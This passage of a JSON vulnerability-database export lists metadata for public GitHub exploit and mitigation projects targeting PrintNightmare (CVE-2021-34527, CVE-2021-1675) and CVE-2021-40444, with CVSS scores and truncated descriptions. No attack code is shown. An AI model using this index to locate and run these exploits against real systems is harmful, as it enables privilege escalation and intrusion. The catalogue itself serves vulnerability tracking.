"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-12T14:14:29", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-18T12:17:08", "id": "D089579B-4420-5AD5-999F-45063D972E66", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-19T06:22:28", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-13T10:04:49", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-12-13T10:21:38", "id": "3DC96731-93EE-5FF0-9AC3-C472059DC1AF", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-25T22:03:53", "description": "# CVE-2021-34527\n\nCVE-2021-34527 LPE exploit using AddPrinterDri...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-05T23:48:44", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2023-08-25T17:42:32", "id": "436B5B97-EF58-5F05-B611-815DDEF67B8A", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:04:32", "description": "# CVE-2021-34527-PrintNightmare-Workaround\n\nThis simple PowerShe...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-05T17:50:56", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-18T12:17:32", "id": "BDFBDA81-0DEB-5523-B538-F23C3B524986", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:04:48", "description": "# Disable-Spooler-Service-PrintNightmare-CVE-2021-34527\nSimple ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-07T06:41:15", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-07T06:47:16", "id": "8542D571-7253-5609-BC52-CBCB5F40929A", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-20T20:54:50", "description": "# CVE-2021-34527 PrintNightmare PoC \ud83d\udc7e\n\n## \ud83d\udcdd Description\nThis sim...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-08-20T12:04:18", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2023-08-20T12:06:06", "id": "F796D11D-F85B-5218-BBFA-9BDBAE5B6A59", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:52:51", "description": "# CVE-2021-40444--CABless version\nUpdate: Modified code so that ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-19T19:46:28", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-17T22:25:33", "id": "0E388E09-F00E-58B6-BEFE-026913357CE0", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:20", "description": "# CVE-2021-40444\nCVE-2021-40444 POC\n\n-----BEGIN PUBLIC KEY-----\n...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-09T02:30:26", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-17T10:41:29", "id": "37D2BE4F-9D7A-51CD-B802-2FAB35B39A4E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-24T12:46:04", "description": "# CVE-2021-40444 docx Generate\n.docx generate...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T02:49:37", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-24T11:57:05", "id": "88EFCA30-5DED-59FB-A476-A92F53D1497E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:36:47", "description": "CVE-2021-40444 builders\n\nThis repo contain builders of cab file,...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-12T18:05:53", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:47:26", "id": "8CD90173-6341-5FAD-942A-A9617561026A", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:39", "description": "\"Fork\" of [lockedbytes](https://github.com/lockedbyte) CVE-2021-...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T13:45:36", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-15T14:42:59", "id": "F5CEF191-B04C-5FC5-82D1-3B728EC648A9", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:27:35", "description": "### CVE-2021-1675 \n\n\u4fee\u6539\u81eahttps://github.com/sailay1996/Prin...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-20T06:26:45", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2021-10-24T06:07:21", "id": "19D705F8-AE98-5DD9-BC4E-CDC0497FB840", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:22:37", "description": "# CVE-2021-1675 - PrintNightmare LPE (PowerShell)\n\n> Caleb Stewa...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-02T06:14:29", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2021-12-10T13:43:31", "id": "272E1B9F-32B1-5E4A-A0A9-44AC16DA37DB", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:22:38", "description": "# CVE-2021-1675\nFix without disabling Print Spooler\n\nScript chec...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T19:50:46", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2021-08-05T03:00:30", "id": "9A318669-DAF8-50FF-A5DF-E390E0386254", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-23T00:06:36", "description": "# CVE-2021-1675 - PrintNightmare DSC Mitigation (PowerShell)\n\n> ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-02T17:29:04", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2021-12-22T20:12:23", "id": "D21805C7-F04C-57A9-8A40-84CEEB7695BC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-07T02:53:04", "description": "# CVE-2021-1675 LPE PoC\r\n\r\nnot my exploit! just wanted to play a...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-05T14:49:32", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2023-03-13T03:40:27", "id": "AF2B8EF5-A739-53BD-8B8D-04A8C441268C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:35:44", "description": "# CVE-2021-1675-PrintNightmare\nWorking PowerShell POC\n\nPowershel...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-05T19:24:23", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2021-10-24T06:08:06", "id": "1883DF48-6A75-5743-AC93-56292D93A794", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:14:22", "description": "# Microsoft-CVE-2021-1675\n\nI have created a small C# project tha...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-16T18:06:05", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2022-04-20T11:31:25", "id": "645DABC8-04DA-51BF-A20F-68F611D2D666", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:04:04", "description": "# PrintNightmare\n\n![image](https://user-images.githubusercontent...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-07T08:32:09", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2022-08-05T17:41:41", "id": "98CEA984-CF02-58F6-91D5-967F8D36F94A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-07T03:16:37", "description": "# CVE-2021-1675_RDL_LPE\nPrintNightMare LPE\u63d0\u6743\u6f0f\u6d1e\u7684CS \u53cd\u5c04\u52a0\u8f7d\u63d2\u4ef6\u3002\u5f00\u7bb1\u5373\u7528\u3001\u901a\u8fc7...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-01T11:25:04", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": 